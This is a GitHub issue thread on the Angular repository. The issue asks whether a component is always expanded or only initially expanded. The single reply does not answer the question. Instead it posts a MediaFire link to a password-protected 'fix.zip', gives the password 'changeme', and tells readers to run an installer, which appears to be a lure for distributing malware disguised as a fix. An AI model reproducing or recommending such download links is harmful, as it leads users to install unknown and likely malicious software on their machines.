### ISSUE TITLE
doesn't that mean it's always expanded? or just initially expanded?

### ISSUE THREAD

**Issue by DLI0178-gauravbahuguna** [angular/angular#57561]
doesn't that mean it's always expanded? or just initially expanded?

_Originally posted by @ORESoftware in https://github.com/angular/components/issues/6962#issuecomment-363307592_

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
